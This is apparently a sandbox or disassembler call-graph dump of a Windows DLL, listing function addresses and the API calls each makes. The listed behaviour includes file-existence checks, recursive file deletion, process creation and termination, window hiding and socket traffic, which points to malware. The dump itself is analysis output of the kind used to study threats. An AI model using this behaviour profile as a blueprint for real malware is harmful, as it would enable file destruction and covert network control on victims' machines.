1000a5a6 28 API calls 2 library calls 21512->21612 21513->21507 21517 10004365 21513->21517 21597 10004890 21517->21597 21518->21462 21520 10004380 21520->21462 21522 10004dd1 21521->21522 21522->21522 21523 10004890 28 API calls 21522->21523 21524 10004e45 21523->21524 21525 10004330 28 API calls 21524->21525 21526 10001f78 21525->21526 21526->21465 21528 10003a89 21527->21528 21529 10003b6c 21527->21529 21531 10003a97 21528->21531 21532 10003aca 21528->21532 21619 1000a5c6 28 API calls 2 library calls 21529->21619 21533 10003b76 21531->21533 21538 10003aa3 21531->21538 21534 10003b80 21532->21534 21535 10003ad6 21532->21535 21620 1000a5c6 28 API calls 2 library calls 21533->21620 21621 1000a5a6 28 API calls 2 library calls 21534->21621 21543 10003ae6 21535->21543 21618 100046f0 28 API calls 2 library calls 21535->21618 21617 10004280 28 API calls ___BuildCatchObject 21538->21617 21542 10003ac1 21542->21474 21543->21474 21545 10004d80 28 API calls 21544->21545 21546 1000682c PathFileExistsW 21545->21546 21547 10006897 21546->21547 21548 1000684b 21546->21548 21550 10004d80 28 API calls 21547->21550 21630 10003970 21548->21630 21552 100068a7 21550->21552 21551 1000686e 21642 10006b40 28 API calls 21551->21642 21554 100068c5 21552->21554 21556 10004160 28 API calls 21552->21556 21555 100068f8 PathFileExistsW 21554->21555 21557 10004160 28 API calls 21554->21557 21558 1000690a 21555->21558 21567 1000693c 21555->21567 21556->21554 21557->21555 21643 100034a0 21558->21643 21560 10007d50 28 API calls 21560->21567 21561 10006917 21650 10006b40 28 API calls 21561->21650 21562 10004160 28 API calls 21562->21567 21564 10004d80 28 API calls 21564->21567 21565 1000687d 21565->21562 21565->21567 21567->21560 21567->21564 21568 10004160 28 API calls 21567->21568 21569 10006a0d PathFileExistsW 21567->21569 21570 10004160 28 API calls 21567->21570 21571 10006af3 21567->21571 21577 10006bc0 28 API calls 21567->21577 21622 10006d90 21567->21622 21651 10004a00 28 API calls ___BuildCatchObject 21567->21651 21568->21567 21569->21567 21570->21569 21572 10004160 28 API calls 21571->21572 21573 10006b05 21571->21573 21572->21573 21574 10006b2b 21573->21574 21576 10004160 28 API calls 21573->21576 21574->21492 21576->21574 21577->21567 21579 100041a0 21578->21579 21582 10004170 21578->21582 21655 1000daab 26 API calls __cftof 21579->21655 21582->21468 21593->21500 21594->21478 21596->21488 21598 10004979 21597->21598 21599 100048a9 21597->21599 21614 1000a5c6 28 API calls 2 library calls 21598->21614 21601 10004983 21599->21601 21602 100048c5 21599->21602 21615 1000a5a6 28 API calls 2 library calls 21601->21615 21604 1000498d 21602->21604 21605 100048dc 21602->21605 21609 100048ea 21602->21609 21616 1000a5a6 28 API calls 2 library calls 21604->21616 21605->21609 21613 100046f0 28 API calls 2 library calls 21605->21613 21609->21520 21610->21518 21613->21609 21614->21601 21617->21542 21618->21543 21619->21533 21620->21534 21623 10006db1 21622->21623 21624 10006dd6 21622->21624 21623->21624 21626 10006dbc 21623->21626 21625 10004890 28 API calls 21624->21625 21627 10006de2 21625->21627 21652 10005a30 28 API calls 2 library calls 21626->21652 21627->21567 21629 10006dc7 21629->21567 21631 100039c6 21630->21631 21636 1000397e 21630->21636 21632 100039d6 21631->21632 21633 10003a5e 21631->21633 21638 100039e6 21632->21638 21653 100046f0 28 API calls 2 library calls 21632->21653 21654 1000a5a6 28 API calls 2 library calls 21633->21654 21636->21631 21639 100039a5 21636->21639 21638->21551 21640 10003a70 28 API calls 21639->21640 21641 100039c0 21640->21641 21641->21551 21642->21565 21644 100034c1 21643->21644 21645 100034d3 21643->21645 21646 10003970 28 API calls 21644->21646 21648 10003970 28 API calls 21645->21648 21647 100034cc 21646->21647 21647->21561 21649 100034f9 21648->21649 21649->21561 21650->21565 21651->21567 21652->21629 21653->21638 21656 10002f82 21657 10002f8d 21656->21657 21663 10002fb9 21656->21663 21658 10002f97 21657->21658 21738 1000daab 26 API calls __cftof 21657->21738 21659 10002fa3 21658->21659 21739 1000daab 26 API calls __cftof 21658->21739 21662 10002faf 21659->21662 21740 1000daab 26 API calls __cftof 21659->21740 21662->21663 21741 1000daab 26 API calls __cftof 21662->21741 21667 10002ff7 21663->21667 21669 10003019 21663->21669 21742 1000daab 26 API calls __cftof 21663->21742 21665 100030df 21678 1000315a 21665->21678 21689 10003138 21665->21689 21754 1000daab 26 API calls __cftof 21665->21754 21671 10003003 21667->21671 21743 1000daab 26 API calls __cftof 21667->21743 21670 10003057 21669->21670 21673 10003079 21669->21673 21746 1000daab 26 API calls __cftof 21669->21746 21680 10003063 21670->21680 21747 1000daab 26 API calls __cftof 21670->21747 21682 1000300f 21671->21682 21744 1000daab 26 API calls __cftof 21671->21744 21673->21665 21674 100030bd 21673->21674 21750 1000daab 26 API calls __cftof 21673->21750 21686 100030c9 21674->21686 21751 1000daab 26 API calls __cftof 21674->21751 21683 1000317b 21678->21683 21701 100031c0 21678->21701 21681 1000306f 21680->21681 21748 1000daab 26 API calls __cftof 21680->21748 21681->21673 21749 1000daab 26 API calls __cftof 21681->21749 21682->21669 21745 1000daab 26 API calls __cftof 21682->21745 21758 10003dc0 21683->21758 21687 100030d5 21686->21687 21752 1000daab 26 API calls __cftof 21686->21752 21687->21665 21753 1000daab 26 API calls __cftof 21687->21753 21693 10003144 21689->21693 21755 1000daab 26 API calls __cftof 21689->21755 21697 10003150 21693->21697 21756 1000daab 26 API calls __cftof 21693->21756 21697->21678 21757 1000daab 26 API calls __cftof 21697->21757 21698 100031a2 21774 100036c0 21698->21774 21704 10003220 21701->21704 21710 100086b0 21701->21710 21703 100031ad 21705 100036c0 26 API calls 21704->21705 21706 10003241 21705->21706 21707 100036c0 26 API calls 21706->21707 21708 10003258 21707->21708 21711 100086c2 21710->21711 21712 1000870b 21710->21712 21713 10008911 21711->21713 21714 100086cd select 21711->21714 21715 10008774 select 21712->21715 21718 100087a0 21712->21718 21713->21701 21714->21701 21715->21718 21717 100087b5 recv 21717->21718 21719 100087d2 WSAGetLastError 21717->21719 21722 1000880b 21718->21722 21724 100097d0 28 API calls 21718->21724 21785 100097d0 21718->21785 21720 10008800 21719->21720 21721 100087df WSAGetLastError 21719->21721 21725 100097d0 28 API calls 21720->21725 21721->21718 21721->21720 21723 100097d0 28 API calls 21722->21723 21726 10008811 closesocket 21723->21726 21724->21718 21735 10008809 ___BuildCatchObject 21725->21735 21727 10008828 21726->21727 21789 1000fc8d 65 API calls 2 library calls 21727->21789 21729 10008850 send 21730 1000886b WSAGetLastError 21729->21730 21729->21735 21732 1000887a WSAGetLastError 21730->21732 21736 100088bf 21730->21736 21731 10008901 closesocket 21731->21713 21732->21735 21732->21736 21733 100088c1 closesocket 21734 100088d8 21733->21734 21790 1000fc8d 65 API calls 2 library calls 21734->21790 21735->21729 21735->21733 21735->21736 21736->21713 21736->21731 21759 10003e25 21758->21759 21760 10003dce 21758->21760 21761 10003eab 21759->21761 21762 10003e2e 21759->21762 21760->21759 21767 10003df4 21760->21767 21811 1000a5a6 28 API calls 2 library calls 21761->21811 21766 10003e3e 21762->21766 21794 10004460 21762->21794 21766->21698 21768 10003df9 21767->21768 21769 10003e0f 21767->21769 21792 10003ec0 28 API calls std::_Xinvalid_argument 21768->21792 21793 10003ec0 28 API calls std::_Xinvalid_argument 21769->21793 21772 10003e1f 21772->21698 21773 10003e09 21773->21698 21775 100036ed 21774->21775 21776 100036cb 21774->21776 21775->21703 21776->21775 21777 100036da 21776->21777 21836 1000daab 26 API calls __cftof 21776->21836 21778 100036e1 21777->21778 21837 1000daab 26 API calls __cftof 21777->21837 21781 100036e8 21778->21781 21838 1000daab 26 API calls __cftof 21778->21838 21781->21775 21839 1000daab 26 API calls __cftof 21781->21839 21786 100097e7 21785->21786 21787 100097f5 ___scrt_fastfail 21785->21787 21786->21787 21791 10009900 28 API calls std::_Xinvalid_argument 21786->21791 21787->21717 21789->21735 21790->21736 21791->21787 21792->21773 21793->21772 21795 10004493 21794->21795 21796 100044f7 21795->21796 21797 100044d7 21795->21797 21802 100044cc 21795->21802 21798 1000a5f3 new 22 API calls 21796->21798 21799 100044e3 21797->21799 21819 1000ade3 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 21797->21819 21798->21802 21812 1000a5f3 21799->21812 21803 10004568 21802->21803 21805 1000458a 21802->21805 21820 1000daab 26 API calls __cftof 21802->21820 21808 10004574 21803->21808 21821 1000daab 26 API calls __cftof 21803->21821 21805->21766 21807 10004580 21807->21805 21823 1000daab 26 API calls __cftof 21807->21823 21808->21807 21822 1000daab 26 API calls __cftof 21808->21822 21815 1000a5f8 21812->21815 21814 1000a624 21814->21802 21815->21814 21824 1000dafb 21815->21824 21831 10014867 7 API calls 2 library calls 21815->21831 21832 1000ae00 RaiseException __CxxThrowException@8 new 21815->21832 21833 1000ade3 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 21815->21833 21829 10015a9f _free 21824->21829 21825 10015add 21835 100160ec 20 API calls _free 21825->21835 21827 10015ac8 RtlAllocateHeap 21828 10015adb 21827->21828 21827->21829 21828->21815 21829->21825 21829->21827 21834 10014867 7 API calls 2 library calls 21829->21834 21831->21815 21834->21829 21835->21828 21840 10015a65 21841 10015a70 RtlFreeHeap 21840->21841 21845 10015a99 _free 21840->21845 21842 10015a85 21841->21842 21841->21845 21846 100160ec 20 API calls _free 21842->21846 21844 10015a8b GetLastError 21844->21845 21846->21844 21847 1000ac67 21848 1000ac73 ___scrt_is_nonwritable_in_current_image 21847->21848 21849 1000ac9c dllmain_raw 21848->21849 21850 1000ac97 21848->21850 21852 1000ac82 ___scrt_is_nonwritable_in_current_image 21848->21852 21851 1000acb6 dllmain_crt_dispatch 21849->21851 21849->21852 21860 10006e40 21850->21860 21851->21850 21851->21852 21855 1000ad03 21855->21852 21856 1000ad0c dllmain_crt_dispatch 21855->21856 21856->21852 21858 1000ad1f dllmain_raw 21856->21858 21857 10006e40 12 API calls 21859 1000acef dllmain_crt_dispatch dllmain_raw 21857->21859 21858->21852 21859->21855 21861 10006e49 21860->21861 21862 10006e4e 21860->21862 21864 10007240 12 API calls 21861->21864 21862->21855 21862->21857 21865 100072d7 21864->21865 21865->21862 21866 100012cb 21867 10004160 28 API calls 21866->21867 21868 100012d5 21867->21868 22024 10005f20 21868->22024 21871 10001315 21872 10001354 21871->21872 21874 10004160 28 API calls 21871->21874 22035 10006020 21872->22035 21873 10004160 28 API calls 21873->21871 21874->21872 21877 10001380 21878 100013bf 21877->21878 21879 10004160 28 API calls 21877->21879 22046 10006120 21878->22046 21879->21878 21881 10004160 28 API calls 21881->21877 21883 100013e8 21884 10001421 21883->21884 21886 10004160 28 API calls 21883->21886 22057 10005c00 21884->22057 21885 10004160 28 API calls 21885->21883 21886->21884 21889 10003a70 28 API calls 21890 10001471 21889->21890 21891 100067d0 31 API calls 21890->21891 21892 1000147c 21891->21892 21893 10003a70 28 API calls 21892->21893 21894 100014be 21893->21894 21895 100067d0 31 API calls 21894->21895 21896 100014c9 21895->21896 21897 10003a70 28 API calls 21896->21897 21898 1000150b 21897->21898 21899 100067d0 31 API calls 21898->21899 21900 10001516 21899->21900 22092 10007a40 CreateFileW 21900->22092 21902 10001539 21903 10003a70 28 API calls 21902->21903 21904 10001577 21903->21904 21905 10003a70 28 API calls 21904->21905 21918 100015bc 21905->21918 21908 100017ea 21910 1000180b Sleep 21908->21910 21930 10001815 21908->21930 22142 10007e20 21908->22142 21909 10003a70 28 API calls 21909->21918 21910->21908 21910->21930 21912 10003a70 28 API calls 21912->21930 21914 10004160 28 API calls 21914->21918 21915 10004c10 28 API calls 21915->21918 21916 10007e20 9 API calls 21919 10001adb 21916->21919 21918->21908 21918->21909 21918->21914 21918->21915 21918->21930 22101 10006220 21918->22101 22120 100025a0 21918->22120 22178 10003ff0 28 API calls std::_Xinvalid_argument 21918->22178 21919->21916 21921 10001b05 21919->21921 21922 10001afb Sleep 21919->21922 21924 10003a70 28 API calls 21921->21924 21922->21919 21922->21921 21925 10001b46 21924->21925 21927 10003a70 28 API calls 21925->21927 21926 100025a0 43 API calls 21926->21930 21931 10001b8b 21927->21931 21928 10004c10 28 API calls 21928->21930 21929 10004160 28 API calls 21929->21930 21930->21912 21930->21919 21930->21926 21930->21928 21930->21929 22154 100063b0 21930->22154 22179 1000daab 26 API calls __cftof 21930->22179 22180 1000a5c6 28 API calls 2 library calls 21930->22180 22181 10003ff0 28 API calls std::_Xinvalid_argument 21930->22181 21933 10001c5c 21931->21933 21957 10001bb1 21931->21957 22165 10007de0 21933->22165 21942 10001c9c 22189 10004be0 28 API calls 21942->22189 21944 100025a0 43 API calls 21944->21957 21945 10001cb5 22190 10004be0 28 API calls 21945->22190 21948 10001cd0 22191 10004be0 28 API calls 21948->22191 21949 100036c0 26 API calls 21949->21957 21951 10001ce9 22192 10004be0 28 API calls 21951->22192 21954 10001d04 22193 10004be0 28 API calls 21954->22193 21955 10004c10 28 API calls 21955->21957 21957->21933 21957->21944 21957->21949 21957->21955 22182 100033e0 28 API calls 21957->22182 22183 10003500 28 API calls 21957->22183 22184 100064b0 36 API calls 21957->22184 22185 10003730 26 API calls 21957->22185 22186 10003460 28 API calls 21957->22186 22187 100036a0 28 API calls 21957->22187 21958 10001d1d 22194 10004be0 28 API calls 21958->22194 21961 10001d38 22195 10004be0 28 API calls 21961->22195 21963 10001d51 22196 10004be0 28 API calls 21963->22196 21965 10001d69 22197 10004be0 28 API calls 21965->22197 21967 10001d7f 22198 10004be0 28 API calls 21967->22198 21969 10001d9a 21970 100036c0 26 API calls 21969->21970 21971 10001da5 21970->21971 21972 100036c0 26 API calls 21971->21972 21973 10001dad 21972->21973 21974 100036c0 26 API calls 21973->21974 21975 10001db8 21974->21975 21976 100036c0 26 API calls 21975->21976 21977 10001dc3 21976->21977 21978 100036c0 26 API calls 21977->21978 21979 10001dce 21978->21979 21980 100036c0 26 API calls 21979->21980 21981 10001dd9 21980->21981 21982 100036c0 26 API calls 21981->21982 21983 10001de4 21982->21983 21984 100036c0 26 API calls 21983->21984 21985 10001def 21984->21985 21986 100036c0 26 API calls 21985->21986 21987 10001dfa 21986->21987 21988 100036c0 26 API calls 21987->21988 21989 10001e05 21988->21989 21990 100036c0 26 API calls 21989->21990 21991 10001e10 21990->21991 22199 100038d0 28 API calls 21991->22199 21993 10001e1b 22200 100038d0 28 API calls 21993->22200 21995 10001e26 22201 100038d0 28 API calls 21995->22201 21997 10001e31 22202 10003460 28 API calls 21997->22202 21999 10001e3c 22203 10003460 28 API calls 21999->22203 22001 10001e44 22204 10003460 28 API calls 22001->22204 22003 10001e4f 22205 10003460 28 API calls 22003->22205 22005 10001e5a 22206 10003460 28 API calls 22005->22206 22007 10001e65 22008 100036c0 26 API calls 22007->22008 22009 10001e70 22008->22009 22010 100036c0 26 API calls 22009->22010 22011 10001e7b 22010->22011 22012 100036c0 26 API calls 22011->22012 22013 10001e86 22012->22013 22014 100036c0 26 API calls 22013->22014 22015 10001e8e 22014->22015 22016 100036c0 26 API calls 22015->22016 22017 10001e99 22016->22017 22018 100036c0 26 API calls 22017->22018 22019 10001ea4 22018->22019 22020 100036c0 26 API calls 22019->22020 22021 10001eaf 22020->22021 22022 100036c0 26 API calls 22021->22022 22023 10001eba 22022->22023 22025 10005f53 22024->22025 22026 10003970 28 API calls 22025->22026 22027 10005f99 22026->22027 22028 10004330 28 API calls 22027->22028 22029 10005faf PathFileExistsW 22028->22029 22030 10005fd2 22029->22030 22032 10005fc7 22029->22032 22031 10003970 28 API calls 22030->22031 22031->22032 22033 100012f1 22032->22033 22034 10004160 28 API calls 22032->22034 22033->21871 22033->21873 22034->22033 22036 10006053 22035->22036 22037 10003970 28 API calls 22036->22037 22038 10006099 22037->22038 22039 10004330 28 API calls 22038->22039 22040 100060af PathFileExistsW 22039->22040 22041 100060d2 22040->22041 22043 100060c7 22040->22043 22042 10003970 28 API calls 22041->22042 22042->22043 22044 1000135c 22043->22044 22045 10004160 28 API calls 22043->22045 22044->21877 22044->21881 22045->22044 22047 10006153 22046->22047 22048 10003970 28 API calls 22047->22048 22049 10006199 22048->22049 22050 10004330 28 API calls 22049->22050 22051 100061af PathFileExistsW 22050->22051 22052 100061d2 22051->22052 22054 100061c7 22051->22054 22053 10003970 28 API calls 22052->22053 22053->22054 22055 100013c7 22054->22055 22056 10004160 28 API calls 22054->22056 22055->21883 22055->21885 22056->22055 22058 10005c37 22057->22058 22059 10003970 28 API calls 22058->22059 22060 10005c79 22059->22060 22061 10004330 28 API calls 22060->22061 22062 10005c8f 22061->22062 22063 10004d80 28 API calls 22062->22063 22064 10005c9f FindFirstFileW 22063->22064 22066 10005cc2 22064->22066 22067 10005ccc 22064->22067 22068 10004160 28 API calls 22066->22068 22069 10005d04 FindNextFileW 22067->22069 22070 10005ce5 22067->22070 22068->22067 22072 10005e96 FindClose 22069->22072 22083 10005d36 22069->22083 22071 10003970 28 API calls 22070->22071 22074 10005cff 22071->22074 22073 100034a0 28 API calls 22072->22073 22076 10005ea9 22073->22076 22078 1000142c 22074->22078 22079 10004160 28 API calls 22074->22079 22075 10005e84 FindNextFileW 22075->22072 22075->22083 22077 100036c0 26 API calls 22076->22077 22077->22074 22078->21889 22079->22078 22080 10003970 28 API calls 22080->22083 22081 10004d80 28 API calls 22081->22083 22082 10006d90 28 API calls 22082->22083 22083->22075 22083->22080 22083->22081 22083->22082 22084 10004160 28 API calls 22083->22084 22085 10005e5c PathFileExistsW 22083->22085 22086 10004160 28 API calls 22083->22086 22089 10005e7a 22083->22089 22084->22083 22085->22083 22087 10005ed9 FindClose 22085->22087 22086->22085 22088 10005eeb 22087->22088 22088->22076 22091 10004160 28 API calls 22088->22091 22090 10004160 28 API calls 22089->22090 22090->22075 22091->22076 22093 10007a68 GetFileSize 22092->22093 22094 10007aca 22092->22094 22095 10007a94 22093->22095 22097 10007a7b ReadFile 22093->22097 22094->21902 22207 10008280 28 API calls 2 library calls 22095->22207 22099 10007ad2 CloseHandle 22097->22099 22100 10007ac4 CloseHandle 22097->22100 22099->21902 22100->22094 22102 10006253 22101->22102 22103 10003970 28 API calls 22102->22103 22104 10006299 22103->22104 22105 10003a70 28 API calls 22104->22105 22106 100062d0 22105->22106 22208 10007ae0 22106->22208 22109 10006300 22110 10006333 22109->22110 22112 10004160 28 API calls 22109->22112 22113 10004330 28 API calls 22110->22113 22111 10004160 28 API calls 22111->22109 22112->22110 22114 10006342 PathFileExistsW 22113->22114 22115 10006365 22114->22115 22117 1000635a 22114->22117 22116 10003970 28 API calls 22115->22116 22116->22117 22118 10006395 22117->22118 22119 10004160 28 API calls 22117->22119 22118->21918 22119->22118 22121 100025e4 ___scrt_fastfail 22120->22121 22221 10004ab0 22121->22221 22125 1000274a 22231 10004e80 22125->22231 22127 10002762 22128 10004cc0 28 API calls 22127->22128 22129 10002778 CreateProcessW 22128->22129 22131 100027bc 22129->22131 22234 10002b20 22131->22234 22134 10002a98 TerminateProcess WaitForSingleObject CloseHandle CloseHandle 22136 10002acc 22134->22136 22139 100036c0 26 API calls 22136->22139 22137 1000296f 22138 10003860 28 API calls 22137->22138 22141 10002983 22138->22141 22140 10002ad7 22139->22140 22140->21918 22141->22134 22143 10007e40 22142->22143 22143->22143 22144 10007ebc FindFirstFileW 22143->22144 22145 10008092 22144->22145 22152 10007ee2 22144->22152 22145->21908 22146 10007f02 FindNextFileW 22147 1000806d GetLastError 22146->22147 22146->22152 22148 10008078 FindClose RemoveDirectoryW 22147->22148 22149 1000808b FindClose 22147->22149 22148->21908 22149->22145 22150 10008021 SetFileAttributesW 22151 10008033 DeleteFileW 22150->22151 22151->22149 22151->22152 22152->22146 22152->22149 22152->22150 22152->22151 22153 10007fed RemoveDirectoryW 22152->22153 22153->22152 22155 100063e3 22154->22155 22156 10003970 28 API calls 22155->22156 22157 10006429 22156->22157 22158 10004330 28 API calls 22157->22158 22159 1000643f PathFileExistsW 22158->22159 22160 10006462 22159->22160 22162 10006457 22159->22162 22161 10003970 28 API calls 22160->22161 22161->22162 22163 10006492 22162->22163 22164 10004160 28 API calls 22162->22164 22163->21930 22164->22163 22167 10007df4 22165->22167 22166 10007e20 9 API calls 22166->22167 22167->22166 22168 10007e01 Sleep 22167->22168 22169 10001c6b 22167->22169 22168->22167 22168->22169 22170 10004c10 22169->22170 22171 10004c5e 22170->22171 22278 100050b0 22171->22278 22175 10004c92 22290 10003ff0 28 API calls std::_Xinvalid_argument 22175->22290 22177 10001c81 22188 10004be0 28 API calls 22177->22188 22178->21918 22180->21930 22181->21930 22182->21957 22183->21957 22184->21957 22185->21957 22186->21957 22187->21957 22188->21942 22189->21945 22190->21948 22191->21951 22192->21954 22193->21958 22194->21961 22195->21963 22196->21965 22197->21967 22198->21969 22199->21993 22200->21995 22201->21997 22202->21999 22203->22001 22204->22003 22205->22005 22206->22007 22207->22097 22209 10007b1b 22208->22209 22210 10003970 28 API calls 22209->22210 22212 10007bef 22209->22212 22214 10007b89 22210->22214 22211 100062e2 22211->22109 22211->22111 22212->22211 22213 10004160 28 API calls 22212->22213 22213->22211 22220 10005130 28 API calls 2 library calls 22214->22220 22216 10007bbf 22217 10003a70 28 API calls 22216->22217 22218 10007bdd 22217->22218 22218->22212 22219 10004160 28 API calls 22218->22219 22219->22212 22220->22216 22226 10004afc 22221->22226 22222 10004330 28 API calls 22223 10004b57 22222->22223 22224 10004890 28 API calls 22223->22224 22225 10002734 22224->22225 22227 10004cc0 22225->22227 22226->22222 22228 10004ce0 22227->22228 22228->22228 22229 10004330 28 API calls 22228->22229 22230 10004d08 ___BuildCatchObject 22229->22230 22230->22125 22232 10004890 28 API calls 22231->22232 22233 10004ea2 ___BuildCatchObject 22232->22233 22233->22127 22235 10002b42 22234->22235 22268 10007310 LoadLibraryW 22235->22268 22237 10002b6f 22238 10002b75 22237->22238 22244 10002b96 22237->22244 22239 10003dc0 28 API calls 22238->22239 22243 10002b91 22239->22243 22240 100036c0 26 API calls 22241 10002951 22240->22241 22241->22134 22261 10003860 22241->22261 22242 10002bf2 GetLastError 22242->22243 22243->22240 22244->22242 22250 10002c15 22244->22250 22245 10002cd2 22273 10002db0 28 API calls 22245->22273 22246 10002d5b 22248 100036c0 26 API calls 22246->22248 22248->22243 22249 100036c0 26 API calls 22249->22246 22250->22245 22250->22246 22272 10003570 28 API calls std::_Xinvalid_argument 22250->22272 22251 10002cdd 22252 10002d07 22251->22252 22254 10002d29 22251->22254 22274 1000daab 26 API calls __cftof 22251->22274 22256 10002d13 22252->22256 22275 1000daab 26 API calls __cftof 22252->22275 22254->22249 22258 10002d1f 22256->22258 22276 1000daab 26 API calls __cftof 22256->22276 22258->22254 22277 1000daab 26 API calls __cftof 22258->22277 22262 10003891 22261->22262 22263 1000387f 22261->22263 22266 10003dc0 28 API calls 22262->22266 22264 10003dc0 28 API calls 22263->22264 22265 1000388a 22264->22265 22265->22137 22267 100038aa 22266->22267 22267->22137 22269 10007326 8 API calls 22268->22269 22270 100073dd 22268->22270 22269->22270 22271 1000739f 22269->22271 22270->22237 22271->22237 22271->22270 22272->22250 22273->22251 22279 100050c2 22278->22279 22288 10004c86 22278->22288 22280 10005121 22279->22280 22281 100050ce 22279->22281 22279->22288 22292 1000a5a6 28 API calls 2 library calls 22280->22292 22283 100050d2 22281->22283 22286 100050f3 22281->22286 22285 10004460 28 API calls 22283->22285 22285->22288 22286->22288 22291 10003c00 26 API calls 22286->22291 22289 10003ff0 28 API calls std::_Xinvalid_argument 22288->22289 22289->22175 22290->22177 22291->22288 22293 1000ad8d 22294 1000ad96 22293->22294 22295 1000ad9b dllmain_dispatch 22293->22295 22297 1000b15b GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 22294->22297 22297->22295 22298 10007890 CreateToolhelp32Snapshot 22299 100078e2 22298->22299 22300 100078bf Process32FirstW 22298->22300 22301 100078db CloseHandle 22300->22301 22307 100078f0 22300->22307 22301->22299 22302 10003970 28 API calls 22302->22307 22303 10004160 28 API calls 22303->22307 22304 10007a10 Process32NextW 22305 10007a2c CloseHandle 22304->22305 22304->22307 22306 100079d1 FindWindowExA GetWindowThreadProcessId 22306->22307 22308 100079f7 ShowWindow 22306->22308 22307->22302 22307->22303 22307->22304 22307->22306 22308->22307 22309 10009293 22310 10009299 22309->22310 22351 10008550 22310->22351 22313 10008550 44 API calls 22317 100092e7 22313->22317 22314 10003dc0 28 API calls 22315 100093aa 22314->22315 22316 100036c0 26 API calls 22315->22316 22319 100093bf 22316->22319 22318 10008550 44 API calls 22317->22318 22325 100092ef 22317->22325 22320 1000931a 22318->22320 22321 100093c4 22319->22321 22324 10009408 send 22319->22324 22322 10008550 44 API calls 22320->22322 22320->22325 22354 100084c0 70 API calls 22321->22354 22322->22325 22328 10009423 22324->22328 22325->22314 22326 100097c1 22327 1000948a send 22329 100094b4 22327->22329 22328->22327 22330 100094c7 send 22329->22330 22331 100094f0 22330->22331 22332 10009507 send 22331->22332 22333 10009520 22332->22333 22334 1000956e 22332->22334 22335 10009557 send 22333->22335 22336 1000959d send 22334->22336 22335->22334 22337 100095c2 22336->22337 22338 100095d7 send 22337->22338 22339 100095fc 22338->22339 22339->22339 22340 1000960f send 22339->22340 22341 10009620 22340->22341 22342 10009641 recv 22341->22342 22343 10009660 22341->22343 22342->22326 22342->22341 22344 10008550 44 API calls 22343->22344 22345 10009698 22344->22345 22345->22321 22347 100096ae 22345->22347 22346 100096d7 recv 22346->22326 22346->22347 22347->22346 22348 10009704 setsockopt ioctlsocket 22347->22348 22349 1000a5f3 new 22 API calls 22348->22349 22350 1000973a 22349->22350 22355 10008520 22351->22355 22354->22326 22356 10008534 ___scrt_initialize_default_local_stdio_options 22355->22356 22359 100147a1 22356->22359 22362 1000ff27 22359->22362 22363 1000ff44 22362->22363 22364 1000ff59 22362->22364 22382 100160ec 20 API calls _free 22363->22382 22364->22363 22368 1000ff5f 22364->22368 22366 1000ff49 22383 1000da9b 26 API calls __cftof 22366->22383 22368->22368 22384 1000e3c5 38 API calls 2 library calls 22368->22384 22370 1000ff54 22375 1000b288 22370->22375 22371 1000ff84 22385 10013d6a 44 API calls 2 library calls 22371->22385 22373 1000853e 22373->22313 22373->22325 22376 1000b291 22375->22376 22377 1000b293 IsProcessorFeaturePresent 22375->22377 22376->22373 22379 1000b2d5 22377->22379 22386 1000b299 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 22379->22386 22381 1000b3b8 22381->22373 22382->22366 22383->22370 22384->22371 22385->22370 22386->22381 22387 10001093 22388 1000dafb new 21 API calls 22387->22388 22389 100010a2 22388->22389 22390 100010f6 22389->22390 22391 100010e3 22389->22391 22399 1000daab 26 API calls __cftof 22389->22399 22393 100010ea 22391->22393 22400 1000daab 26 API calls __cftof 22391->22400 22395 100010f1 22393->22395 22401 1000daab 26 API calls __cftof 22393->22401 22395->22390 22402 1000daab 26 API calls __cftof 22395->22402 22403 100085d8 22404 100085e1 22403->22404 22405 100085e3 getaddrinfo 22403->22405 22404->22405 22406 100085fa FormatMessageA 22405->22406 22412 10008642 22405->22412 22407 1000862a 22406->22407 22416 100084c0 70 API calls 22407->22416 22408 10008688 FreeAddrInfoW 22409 10008650 socket 22411 10008666 connect 22409->22411 22409->22412 22414 10008685 22411->22414 22415 10008678 closesocket 22411->22415 22412->22408 22412->22409 22412->22414 22413 10008633 22414->22408 22415->22412 22416->22413 22417 1000267b 22418 100034a0 28 API calls 22417->22418 22419 10002684 22418->22419 22456 100076d0 CreateToolhelp32Snapshot 22419->22456 22421 10002693 22466 10003330 22421->22466 22423 1000269c 22424 100026b7 22423->22424 22427 100026ed 22423->22427 22471 1000daab 26 API calls __cftof 22423->22471 22424->22427 22430 100026cb 22424->22430 22472 1000daab 26 API calls __cftof 22424->22472 22425 10002723 22429 10004ab0 28 API calls 22425->22429 22427->22425 22428 10004160 28 API calls 22427->22428 22428->22425 22431 10002734 22429->22431 22433 100026d7 22430->22433 22473 1000daab 26 API calls __cftof 22430->22473 22435 10004cc0 28 API calls 22431->22435 22434 100026e3 22433->22434 22474 1000daab 26 API calls __cftof 22433->22474 22434->22427 22475 1000daab 26 API calls __cftof 22434->22475 22438 1000274a 22435->22438 22440 10004e80 28 API calls 22438->22440 22441 10002762 22440->22441 22442 10004cc0 28 API calls 22441->22442 22443 10002778 CreateProcessW 22442->22443 22445 100027bc 22443->22445 22446 10002b20 38 API calls 22445->22446 22447 10002951 22446->22447 22448 10002a98 TerminateProcess WaitForSingleObject CloseHandle CloseHandle 22447->22448 22449 10003860 28 API calls 22447->22449 22450 10002acc 22448->22450 22451 1000296f 22449->22451 22453 100036c0 26 API calls 22450->22453 22452 10003860 28 API calls 22451->22452 22455 10002983 22452->22455 22454 10002ad7 22453->22454 22455->22448 22457 10007732 Process32FirstW 22456->22457 22458 10007755 22456->22458 22459 1000774e CloseHandle 22457->22459 22461 10007780 22457->22461 22458->22421 22459->22458 22460 10003970 28 API calls 22460->22461 22461->22460 22462 10004160 28 API calls 22461->22462 22463 10007844 Process32NextW 22461->22463 22476 100080a0 28 API calls std::_Xinvalid_argument 22461->22476 22462->22461 22463->22461 22465 10007860 CloseHandle 22463->22465 22465->22421 22467 10003353 22466->22467 22468 1000333e 22466->22468 22467->22423 22468->22467 22477 1000daab 26 API calls __cftof 22468->22477 22476->22463 22478 1002175e 22479 10021775 22478->22479 22488 100217e3 22478->22488 22479->22488 22490 1002179d GetModuleHandleA 22479->22490 22480 10021829 22481 100217ec GetModuleHandleA 22484 100217f6 22481->22484 22483 10021794 22483->22484 22486 100217b7 GetProcAddress 22483->22486 22483->22488 22485 10021816 GetProcAddress 22484->22485 22484->22488 22485->22488 22487 100217c4 VirtualProtect 22486->22487 22486->22488 22487->22488 22489 100217d3 VirtualProtect 